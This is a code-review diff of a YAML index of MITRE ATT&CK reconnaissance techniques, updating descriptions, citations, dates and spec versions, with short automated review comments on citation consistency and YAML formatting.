+ - 'Internet Scan: Response Content'
type: attack-pattern
+ id: attack-pattern--09312b1a-c3c6-4b45-9844-3ccc78e5d82f
created: '2020-10-02T16:39:33.966Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
external_references:
- source_name: mitre-attack
- external_id: T1592
url: https://attack.mitre.org/techniques/T1592
+ external_id: T1592
- source_name: ATT ScanBox
- url: https://cybersecurity.att.com/blogs/labs-research/scanbox-a-reconnaissance-framework-used-on-watering-hole-attacks
description: 'Blasco, J. (2014, August 28). Scanbox: A Reconnaissance Framework
Used with Watering Hole Attacks. Retrieved October 19, 2020.'
+ url: https://cybersecurity.att.com/blogs/labs-research/scanbox-a-reconnaissance-framework-used-on-watering-hole-attacks
+ - source_name: TrellixQakbot
+ description: Pham Duy Phuc, John Fokker J.E., Alejandro Houspanossian and
+ Mathanraj Thangaraju. (2023, March 7). Qakbot Evolves to OneNote Malware
+ Distribution. Retrieved August 1, 2024.
+ url: https://www.trellix.com/blogs/research/qakbot-evolves-to-onenote-malware-distribution/
- source_name: ThreatConnect Infrastructure Dec 2020
- url: https://threatconnect.com/blog/infrastructure-research-hunting/
description: 'ThreatConnect. (2020, December 15). Infrastructure Research
and Hunting: Boiling the Domain Ocean. Retrieved October 12, 2021.'
- modified: '2022-04-25T14:00:00.188Z'
- name: Gather Victim Host Information
- description: |-
- Adversaries may gather information about the victim's hosts that can be used during targeting. Information about hosts may include a variety of details, including administrative data (ex: name, assigned IP, functionality, etc.) as well as specifics regarding its configuration (ex: operating system, language, etc.).
-
- Adversaries may gather this information in various ways, such as direct collection actions via [Active Scanning](https://attack.mitre.org/techniques/T1595) or [Phishing for Information](https://attack.mitre.org/techniques/T1598). Adversaries may also compromise sites then include malicious content designed to collect host information from visitors.(Citation: ATT ScanBox) Information about hosts may also be exposed to adversaries via online or other accessible data sets (ex: [Social Media](https://attack.mitre.org/techniques/T1593/001) or [Search Victim-Owned Websites](https://attack.mitre.org/techniques/T1594)). Gathering this information may reveal opportunities for other forms of reconnaissance (ex: [Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593) or [Search Open Technical Databases](https://attack.mitre.org/techniques/T1596)), establishing operational resources (ex: [Develop Capabilities](https://attack.mitre.org/techniques/T1587) or [Obtain Capabilities](https://attack.mitre.org/techniques/T1588)), and/or initial access (ex: [Supply Chain Compromise](https://attack.mitre.org/techniques/T1195) or [External Remote Services](https://attack.mitre.org/techniques/T1133)).
- kill_chain_phases:
- - kill_chain_name: mitre-attack
- phase_name: reconnaissance
- x_mitre_detection: |-
- Internet scanners may be used to look for patterns associated with malicious content designed to collect host information from visitors.(Citation: ThreatConnect Infrastructure Dec 2020)(Citation: ATT ScanBox)
-
- Much of this activity may have a very high occurrence and associated false positive rate, as well as potentially taking place outside the visibility of the target organization, making detection difficult for defenders. Detection efforts may be focused on related stages of the adversary lifecycle, such as during Initial Access.
- x_mitre_version: '1.1'
+ url: https://threatconnect.com/blog/infrastructure-research-hunting/
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- x_mitre_data_sources:
- - 'Internet Scan: Response Content'
- x_mitre_is_subtechnique: false
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1596.003:
technique:
@@ -54607,7 +55284,7 @@ reconnaissance:
url: https://medium.com/@menakajain/export-download-ssl-certificate-from-server-site-url-bcfc41ea46a2
description: Jain, M. (2019, September 16). Export & Download — SSL Certificate
from Server (Site URL). Retrieved October 20, 2020.
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2021-04-15T03:48:37.628Z'
name: Digital Certificates
description: |-
Adversaries may search public digital certificate data for information about victims that can be used during targeting. Digital certificates are issued by a certificate authority (CA) in order to cryptographically verify the origin of signed content. These certificates, such as those used for encrypted web traffic (HTTPS SSL/TLS communications), contain information about the registered organization such as name and location.
@@ -54623,8 +55300,6 @@ reconnaissance:
x_mitre_is_subtechnique: true
x_mitre_version: '1.0'
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1597.002:
technique:
@@ -54646,7 +55321,7 @@ reconnaissance:
url: https://www.zdnet.com/article/a-hacker-group-is-selling-more-than-73-million-user-records-on-the-dark-web/
description: Cimpanu, C. (2020, May 9). A hacker group is selling more than
73 million user records on the dark web. Retrieved October 20, 2020.
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2021-04-15T03:44:43.900Z'
name: Purchase Technical Data
description: |-
Adversaries may purchase technical information about victims that can be used during targeting. Information about victims may be available for purchase within reputable private sources and databases, such as paid subscriptions to feeds of scan databases or other data aggregation services. Adversaries may also purchase information from less-reputable sources such as dark web or cybercrime blackmarkets.
@@ -54662,8 +55337,6 @@ reconnaissance:
x_mitre_is_subtechnique: true
x_mitre_version: '1.0'
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1590.005:
technique:
@@ -54691,7 +55364,7 @@ reconnaissance:
url: https://www.circl.lu/services/passive-dns/
description: CIRCL Computer Incident Response Center. (n.d.). Passive DNS.
Retrieved October 20, 2020.
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2021-04-15T03:31:05.302Z'
name: IP Addresses
description: |-
Adversaries may gather the victim's IP addresses that can be used during targeting. Public IP addresses may be allocated to organizations by block, or a range of sequential addresses. Information about assigned IP addresses may include a variety of details, such as which IP addresses are in use. IP addresses may also enable an adversary to derive other details about a victim, such as organizational size, physical location(s), Internet service provider, and or where/how their publicly-facing infrastructure is hosted.
@@ -54707,33 +55380,33 @@ reconnaissance:
x_mitre_is_subtechnique: true
x_mitre_version: '1.0'
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1590.002:
technique:
- modified: '2022-10-21T14:32:48.393Z'
+ modified: '2024-11-11T16:13:02.196Z'
name: DNS
description: |-
- Adversaries may gather information about the victim's DNS that can be used during targeting. DNS information may include a variety of details, including registered name servers as well as records that outline addressing for a target’s subdomains, mail servers, and other hosts. DNS, MX, TXT, and SPF records may also reveal the use of third party cloud and SaaS providers, such as Office 365, G Suite, Salesforce, or Zendesk.(Citation: Sean Metcalf Twitter DNS Records)
+ Adversaries may gather information about the victim's DNS that can be used during targeting. DNS information may include a variety of details, including registered name servers as well as records that outline addressing for a target’s subdomains, mail servers, and other hosts. DNS MX, TXT, and SPF records may also reveal the use of third party cloud and SaaS providers, such as Office 365, G Suite, Salesforce, or Zendesk.(Citation: Sean Metcalf Twitter DNS Records)
Adversaries may gather this information in various ways, such as querying or otherwise collecting details via [DNS/Passive DNS](https://attack.mitre.org/techniques/T1596/001). DNS information may also be exposed to adversaries via online or other accessible data sets (ex: [Search Open Technical Databases](https://attack.mitre.org/techniques/T1596)).(Citation: DNS Dumpster)(Citation: Circl Passive DNS) Gathering this information may reveal opportunities for other forms of reconnaissance (ex: [Search Open Technical Databases](https://attack.mitre.org/techniques/T1596), [Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593), or [Active Scanning](https://attack.mitre.org/techniques/T1595)), establishing operational resources (ex: [Acquire Infrastructure](https://attack.mitre.org/techniques/T1583) or [Compromise Infrastructure](https://attack.mitre.org/techniques/T1584)), and/or initial access (ex: [External Remote Services](https://attack.mitre.org/techniques/T1133)).
+
+ Adversaries may also use DNS zone transfer (DNS query type AXFR) to collect all records from a misconfigured DNS server.(Citation: Trails-DNS)(Citation: DNS-CISA)(Citation: Alexa-dns)
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: reconnaissance
+ x_mitre_contributors:
+ - Jannie Li, Microsoft Threat Intelligence Center (MSTIC)
+ x_mitre_deprecated: false
x_mitre_detection: |-
Much of this activity may have a very high occurrence and associated false positive rate, as well as potentially taking place outside the visibility of the target organization, making detection difficult for defenders.
Detection efforts may be focused on related stages of the adversary lifecycle, such as during Initial Access.
- x_mitre_platforms:
- - PRE
- x_mitre_is_subtechnique: true
- x_mitre_deprecated: false
x_mitre_domains:
- enterprise-attack
- x_mitre_version: '1.1'
- x_mitre_contributors:
- - Jannie Li, Microsoft Threat Intelligence Center (MSTIC)
+ x_mitre_is_subtechnique: true
+ x_mitre_platforms:
+ - PRE
+ x_mitre_version: '1.2'
type: attack-pattern
id: attack-pattern--0ff59227-8aa8-4c09-bf1f-925605bd07ea
created: '2020-10-02T15:47:10.102Z'
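Review bot: the new third paragraph of the T1590.002 description cites `Trails-DNS`, `DNS-CISA` and `Alexa-dns`, and all three are added to `external_references` in the following hunk, so the citation keys resolve. The wording change from "DNS, MX, TXT, and SPF records" to "DNS MX, TXT, and SPF records" is a correction (MX, TXT and SPF are DNS record types, not peers of DNS), and the `x_mitre_version` bump from '1.1' to '1.2' matches the description change. The remaining lines are key reordering with unchanged values.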
@@ -54747,18 +55420,29 @@ reconnaissance:
description: CIRCL Computer Incident Response Center. (n.d.). Passive DNS.
Retrieved October 20, 2020.
url: https://www.circl.lu/services/passive-dns/
+ - source_name: DNS-CISA
+ description: CISA. (2016, September 29). DNS Zone Transfer AXFR Requests May
+ Leak Domain Information. Retrieved June 5, 2024.
+ url: https://www.cisa.gov/news-events/alerts/2015/04/13/dns-zone-transfer-axfr-requests-may-leak-domain-information
- source_name: DNS Dumpster
description: Hacker Target. (n.d.). DNS Dumpster. Retrieved October 20, 2020.
url: https://dnsdumpster.com/
+ - source_name: Alexa-dns
+ description: Scanning Alexa's Top 1M for AXFR. (2015, March 29). Retrieved
+ June 5, 2024.
+ url: https://en.internetwache.org/scanning-alexas-top-1m-for-axfr-29-03-2015/
- source_name: Sean Metcalf Twitter DNS Records
description: Sean Metcalf. (2019, May 9). Sean Metcalf Twitter. Retrieved
- May 27, 2022.
- url: https://twitter.com/PyroTek3/status/1126487227712921600/photo/1
+ September 12, 2024.
+ url: https://x.com/PyroTek3/status/1126487227712921600
+ - source_name: Trails-DNS
+ description: SecurityTrails. (2018, March 14). Wrong Bind Configuration Exposes
+ the Complete List of Russian TLD's to the Internet. Retrieved June 5, 2024.
+ url: https://web.archive.org/web/20180615055527/https://securitytrails.com/blog/russian-tlds
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 2.1.0
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1596.002:
technique:
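Review bot: in the new `DNS-CISA` reference the description dates the alert to 2016, September 29, while the URL path contains `2015/04/13`; one of the two is wrong, and since the entry is copied from upstream it is probably better reported there than patched locally. The Sean Metcalf reference moves from the `twitter.com/.../photo/1` URL to `x.com/...` with a new retrieval date, and `Trails-DNS` points at a web.archive.org snapshot, which is the right choice for a post that may no longer be live.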
@@ -54779,7 +55463,7 @@ reconnaissance:
- source_name: WHOIS
url: https://www.whois.net/
description: NTT America. (n.d.). Whois Lookup. Retrieved October 20, 2020.
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2021-04-15T03:50:44.113Z'
name: WHOIS
description: |-
Adversaries may search public WHOIS data for information about victims that can be used during targeting. WHOIS data is stored by regional Internet registries (RIR) responsible for allocating and assigning Internet resources such as domain names. Anyone can query WHOIS servers for information about a registered domain, such as assigned IP blocks, contact information, and DNS nameservers.(Citation: WHOIS)
@@ -54795,39 +55479,37 @@ reconnaissance:
x_mitre_is_subtechnique: true
x_mitre_version: '1.0'
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1594:
technique:
- x_mitre_platforms:
- - PRE
- x_mitre_domains:
- - enterprise-attack
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- id: attack-pattern--16cdd21f-da65-4e4f-bc04-dd7d198c7b26
- type: attack-pattern
- created: '2020-10-02T16:51:50.306Z'
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- external_references:
- - source_name: mitre-attack
- external_id: T1594
- url: https://attack.mitre.org/techniques/T1594
- - source_name: Comparitech Leak
- url: https://www.comparitech.com/blog/vpn-privacy/350-million-customer-records-exposed-online/
- description: Bischoff, P. (2020, October 15). Broadvoice database of more
- than 350 million customer records exposed online. Retrieved October 20,
- 2020.
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2024-10-02T18:52:21.278Z'
name: Search Victim-Owned Websites
- description: |-
- Adversaries may search websites owned by the victim for information that can be used during targeting. Victim-owned websites may contain a variety of details, including names of departments/divisions, physical locations, and data about key employees such as names, roles, and contact info (ex: [Email Addresses](https://attack.mitre.org/techniques/T1589/002)). These sites may also have details highlighting business operations and relationships.(Citation: Comparitech Leak)
-
- Adversaries may search victim-owned websites to gather actionable information. Information from these sources may reveal opportunities for other forms of reconnaissance (ex: [Phishing for Information](https://attack.mitre.org/techniques/T1598) or [Search Open Technical Databases](https://attack.mitre.org/techniques/T1596)), establishing operational resources (ex: [Establish Accounts](https://attack.mitre.org/techniques/T1585) or [Compromise Accounts](https://attack.mitre.org/techniques/T1586)), and/or initial access (ex: [Trusted Relationship](https://attack.mitre.org/techniques/T1199) or [Phishing](https://attack.mitre.org/techniques/T1566)).
+ description: "Adversaries may search websites owned by the victim for information
+ that can be used during targeting. Victim-owned websites may contain a variety
+ of details, including names of departments/divisions, physical locations,
+ and data about key employees such as names, roles, and contact info (ex: [Email
+ Addresses](https://attack.mitre.org/techniques/T1589/002)). These sites may
+ also have details highlighting business operations and relationships.(Citation:
+ Comparitech Leak)\n\nAdversaries may search victim-owned websites to gather
+ actionable information. Information from these sources may reveal opportunities
+ for other forms of reconnaissance (ex: [Phishing for Information](https://attack.mitre.org/techniques/T1598)
+ or [Search Open Technical Databases](https://attack.mitre.org/techniques/T1596)),
+ establishing operational resources (ex: [Establish Accounts](https://attack.mitre.org/techniques/T1585)
+ or [Compromise Accounts](https://attack.mitre.org/techniques/T1586)), and/or
+ initial access (ex: [Trusted Relationship](https://attack.mitre.org/techniques/T1199)
+ or [Phishing](https://attack.mitre.org/techniques/T1566)).\n\nIn addition
+ to manually browsing the website, adversaries may attempt to identify hidden
+ directories or files that could contain additional sensitive information or
+ vulnerable functionality. They may do this through automated activities such
+ as [Wordlist Scanning](https://attack.mitre.org/techniques/T1595/003), as
+ well as by leveraging files such as sitemap.xml and robots.txt.(Citation:
+ Perez Sitemap XML 2023)(Citation: Register Robots TXT 2015) "
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: reconnaissance
+ x_mitre_contributors:
+ - James P Callahan, Professional Paranoid
+ x_mitre_deprecated: false
x_mitre_detection: Monitor for suspicious network traffic that could be indicative
of adversary reconnaissance, such as rapid successions of requests indicative
of web crawling and/or large quantities of requests originating from a single
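Review bot: the T1594 `description` switches from the `|-` block scalar used by every other technique in this file to a double-quoted scalar with literal `\n\n` sequences, and the closing line `Perez Sitemap XML 2023)(Citation: Register Robots TXT 2015) "` carries a trailing space inside the string. The parsed text is the same apart from that trailing space, and the trailing space is most likely why the dumper fell back to quoted style (block style is not used for strings ending in whitespace); stripping it upstream or in the generator would restore the block style and keep the description consistent with its neighbours. The two new citations in the added sentence resolve to references added in the next hunk.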
@@ -54835,13 +55517,41 @@ reconnaissance:
Analyzing web metadata may also reveal artifacts that can be attributed to
potentially malicious activity, such as referer or user-agent string HTTP/S
fields.
- x_mitre_version: '1.0'
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ x_mitre_domains:
+ - enterprise-attack
+ x_mitre_is_subtechnique: false
+ x_mitre_platforms:
+ - PRE
+ x_mitre_version: '1.1'
x_mitre_data_sources:
- 'Application Log: Application Log Content'
- x_mitre_is_subtechnique: false
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
+ type: attack-pattern
+ id: attack-pattern--16cdd21f-da65-4e4f-bc04-dd7d198c7b26
+ created: '2020-10-02T16:51:50.306Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1594
+ external_id: T1594
+ - source_name: Perez Sitemap XML 2023
+ description: Adi Perez. (2023, February 22). How Attackers Can Misuse Sitemaps
+ to Enumerate Users and Discover Sensitive Information. Retrieved July 18,
+ 2024.
+ url: https://medium.com/@adimenia/how-attackers-can-misuse-sitemaps-to-enumerate-users-and-discover-sensitive-information-361a5065857a
+ - source_name: Comparitech Leak
+ description: Bischoff, P. (2020, October 15). Broadvoice database of more
+ than 350 million customer records exposed online. Retrieved October 20,
+ 2020.
+ url: https://www.comparitech.com/blog/vpn-privacy/350-million-customer-records-exposed-online/
+ - source_name: Register Robots TXT 2015
+ description: Darren Pauli. (2015, May 19). Robots.txt tells hackers the places
+ you don't want them to look. Retrieved July 18, 2024.
+ url: https://www.theregister.com/2015/05/19/robotstxt/
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
atomic_tests: []
T1596.001:
technique:
@@ -54866,7 +55576,7 @@ reconnaissance:
url: https://www.circl.lu/services/passive-dns/
description: CIRCL Computer Incident Response Center. (n.d.). Passive DNS.
Retrieved October 20, 2020.
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2021-04-15T03:49:13.409Z'
name: DNS/Passive DNS
description: |-
Adversaries may search DNS data for information about victims that can be used during targeting. DNS information may include a variety of details, including registered name servers as well as records that outline addressing for a target’s subdomains, mail servers, and other hosts.
@@ -54882,8 +55592,6 @@ reconnaissance:
x_mitre_is_subtechnique: true
x_mitre_version: '1.0'
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1591.003:
technique:
@@ -54905,7 +55613,7 @@ reconnaissance:
url: https://threatpost.com/broadvoice-leaks-350m-records-voicemail-transcripts/160158/
description: Seals, T. (2020, October 15). Broadvoice Leak Exposes 350M Records,
Personal Voicemail Transcripts. Retrieved October 20, 2020.
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2021-04-15T03:38:31.983Z'
name: Identify Business Tempo
description: |-
Adversaries may gather information about the victim's business tempo that can be used during targeting. Information about an organization’s business tempo may include a variety of details, including operational hours/days of the week. This information may also reveal times/dates of purchases and shipments of the victim’s hardware and software resources.
@@ -54921,8 +55629,6 @@ reconnaissance:
x_mitre_is_subtechnique: true
x_mitre_version: '1.0'
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1592.001:
technique:
@@ -54948,7 +55654,7 @@ reconnaissance:
url: https://threatconnect.com/blog/infrastructure-research-hunting/
description: 'ThreatConnect. (2020, December 15). Infrastructure Research
and Hunting: Boiling the Domain Ocean. Retrieved October 12, 2021.'
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2021-10-17T16:32:10.810Z'
name: 'Gather Victim Host Information: Hardware'
description: |-
Adversaries may gather information about the victim's host hardware that can be used during targeting. Information about hardware infrastructure may include a variety of details such as types and versions on specific hosts, as well as the presence of additional components that might be indicative of added defensive protections (ex: card/biometric readers, dedicated encryption hardware, etc.).
@@ -54966,13 +55672,11 @@ reconnaissance:
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_data_sources:
- 'Internet Scan: Response Content'
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
identifier: T1592.001
atomic_tests: []
T1598.003:
technique:
- modified: '2024-04-19T13:26:16.082Z'
+ modified: '2024-05-31T04:18:44.567Z'
name: Spearphishing Link
description: |-
Adversaries may send spearphishing messages with a malicious link to elicit sensitive information that can be used during targeting. Spearphishing for information is an attempt to trick targets into divulging information, frequently credentials or other actionable information. Spearphishing for information frequently involves social engineering techniques, such as posing as a source with a reason to collect information (ex: [Establish Accounts](https://attack.mitre.org/techniques/T1585) or [Compromise Accounts](https://attack.mitre.org/techniques/T1586)) and/or sending multiple, seemingly urgent messages.
@@ -55028,7 +55732,7 @@ reconnaissance:
- source_name: ACSC Email Spoofing
description: Australian Cyber Security Centre. (2012, December). Mitigating
Spoofed Emails Using Sender Policy Framework. Retrieved October 19, 2020.
- url: https://www.cyber.gov.au/sites/default/files/2019-03/spoof_email_sender_policy_framework.pdf
+ url: https://web.archive.org/web/20210708014107/https://www.cyber.gov.au/sites/default/files/2019-03/spoof_email_sender_policy_framework.pdf
- source_name: TrendMictro Phishing
description: Babon, P. (2020, September 3). Tricky 'Forms' of Phishing. Retrieved
October 20, 2020.
@@ -55079,7 +55783,6 @@ reconnaissance:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1590.004:
technique:
@@ -55100,7 +55803,7 @@ reconnaissance:
- source_name: DNS Dumpster
url: https://dnsdumpster.com/
description: Hacker Target. (n.d.). DNS Dumpster. Retrieved October 20, 2020.
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2021-04-15T03:33:02.476Z'
name: Network Topology
description: |-
Adversaries may gather information about the victim's network topology that can be used during targeting. Information about network topologies may include a variety of details, including the physical and/or logical arrangement of both external-facing and internal network environments. This information may also include specifics regarding network devices (gateways, routers, etc.) and other infrastructure.
@@ -55116,8 +55819,6 @@ reconnaissance:
x_mitre_is_subtechnique: true
x_mitre_version: '1.0'
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1590.003:
technique:
@@ -55139,7 +55840,7 @@ reconnaissance:
url: https://www.slideshare.net/rootedcon/carlos-garca-pentesting-active-directory-forests-rooted2019
description: García, C. (2019, April 3). Pentesting Active Directory Forests.
Retrieved October 20, 2020.
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2021-04-15T03:34:22.917Z'
name: Network Trust Dependencies
description: |-
Adversaries may gather information about the victim's network trust dependencies that can be used during targeting. Information about network trusts may include a variety of details, including second or third-party organizations/domains (ex: managed service providers, contractors, etc.) that have connected (and potentially elevated) network access.
@@ -55155,8 +55856,6 @@ reconnaissance:
x_mitre_is_subtechnique: true
x_mitre_version: '1.0'
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1597.001:
technique:
@@ -55178,7 +55877,7 @@ reconnaissance:
url: https://d3security.com/blog/10-of-the-best-open-source-threat-intelligence-feeds/
description: Banerd, W. (2019, April 30). 10 of the Best Open Source Threat
Intelligence Feeds. Retrieved October 20, 2020.
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2021-04-15T03:45:30.862Z'
name: Threat Intel Vendors
description: |-
Adversaries may search private data from threat intelligence vendors for information that can be used during targeting. Threat intelligence vendors may offer paid feeds or portals that offer more data than what is publicly reported. Although sensitive details (such as customer names and other identifiers) may be redacted, this information may contain trends regarding breaches such as target industries, attribution claims, and successful TTPs/countermeasures.(Citation: D3Secutrity CTI Feeds)
@@ -55194,12 +55893,10 @@ reconnaissance:
x_mitre_is_subtechnique: true
x_mitre_version: '1.0'
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1589:
technique:
- modified: '2024-04-19T04:27:00.005Z'
+ modified: '2024-09-16T16:09:45.794Z'
name: Gather Victim Identity Information
description: |-
Adversaries may gather information about the victim's identity that can be used during targeting. Information about identities may include a variety of details, including personal data (ex: employee names, email addresses, security question responses, etc.) as well as sensitive details such as credentials or multi-factor authentication (MFA) configurations.
@@ -55239,8 +55936,8 @@ reconnaissance:
external_id: T1589
- source_name: OPM Leak
description: Cybersecurity Resource Center. (n.d.). CYBERSECURITY INCIDENTS.
- Retrieved October 20, 2020.
- url: https://www.opm.gov/cybersecurity/cybersecurity-incidents/
+ Retrieved September 16, 2024.
+ url: https://web.archive.org/web/20230602111604/https://www.opm.gov/cybersecurity/cybersecurity-incidents/
- source_name: Detectify Slack Tokens
description: Detectify. (2016, April 28). Slack bot token leakage exposing
business critical information. Retrieved October 19, 2020.
@@ -55285,11 +55982,10 @@ reconnaissance:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1595.002:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2024-10-15T13:37:31.317Z'
name: Vulnerability Scanning
description: |-
Adversaries may scan victims for vulnerabilities that can be used during targeting. Vulnerability scans typically check if the configuration of a target host/application (ex: software and version) potentially aligns with the target of a specific exploit the adversary may seek to use.
@@ -55329,9 +56025,8 @@ reconnaissance:
url: https://owasp.org/www-project-automated-threats-to-web-applications/assets/oats/EN/OAT-014_Vulnerability_Scanning
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.1.0
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1596:
technique:
@@ -55393,7 +56088,6 @@ reconnaissance:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 2.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1595:
technique:
@@ -55419,7 +56113,7 @@ reconnaissance:
url: https://wiki.owasp.org/index.php/OAT-004_Fingerprinting
description: OWASP Wiki. (2018, February 16). OAT-004 Fingerprinting. Retrieved
October 20, 2020.
- modified: '2022-05-11T14:00:00.188Z'
+ modified: '2022-03-08T20:58:13.661Z'
name: Active Scanning
description: |-
Adversaries may execute active reconnaissance scans to gather information that can be used during targeting. Active scans are those where the adversary probes victim infrastructure via network traffic, as opposed to other forms of reconnaissance that do not involve direct interaction.
@@ -55440,8 +56134,6 @@ reconnaissance:
- 'Network Traffic: Network Traffic Flow'
- 'Network Traffic: Network Traffic Content'
x_mitre_is_subtechnique: false
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1589.002:
technique:
@@ -55506,7 +56198,6 @@ reconnaissance:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 2.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1598.004:
technique:
@@ -55554,7 +56245,6 @@ reconnaissance:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1590.006:
technique:
@@ -55576,7 +56266,7 @@ reconnaissance:
url: https://nmap.org/book/firewalls.html
description: Nmap. (n.d.). Chapter 10. Detecting and Subverting Firewalls
and Intrusion Detection Systems. Retrieved October 20, 2020.
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2021-04-15T03:31:54.275Z'
name: Network Security Appliances
description: |-
Adversaries may gather information about the victim's network security appliances that can be used during targeting. Information about network security appliances may include a variety of details, such as the existence and specifics of deployed firewalls, content filters, and proxies/bastion hosts. Adversaries may also target information about victim network-based intrusion detection systems (NIDS) or other appliances related to defensive cybersecurity operations.
@@ -55592,34 +56282,10 @@ reconnaissance:
x_mitre_is_subtechnique: true
x_mitre_version: '1.0'
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1593.002:
technique:
- x_mitre_platforms:
- - PRE
- x_mitre_domains:
- - enterprise-attack
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- id: attack-pattern--6e561441-8431-4773-a9b8-ccf28ef6a968
- type: attack-pattern
- created: '2020-10-02T16:50:12.809Z'
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- external_references:
- - source_name: mitre-attack
- external_id: T1593.002
- url: https://attack.mitre.org/techniques/T1593/002
- - source_name: SecurityTrails Google Hacking
- url: https://securitytrails.com/blog/google-hacking-techniques
- description: Borges, E. (2019, March 5). Exploring Google Hacking Techniques.
- Retrieved October 20, 2020.
- - source_name: ExploitDB GoogleHacking
- url: https://www.exploit-db.com/google-hacking-database
- description: Offensive Security. (n.d.). Google Hacking Database. Retrieved
- October 23, 2020.
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2024-09-12T19:19:47.758Z'
name: Search Engines
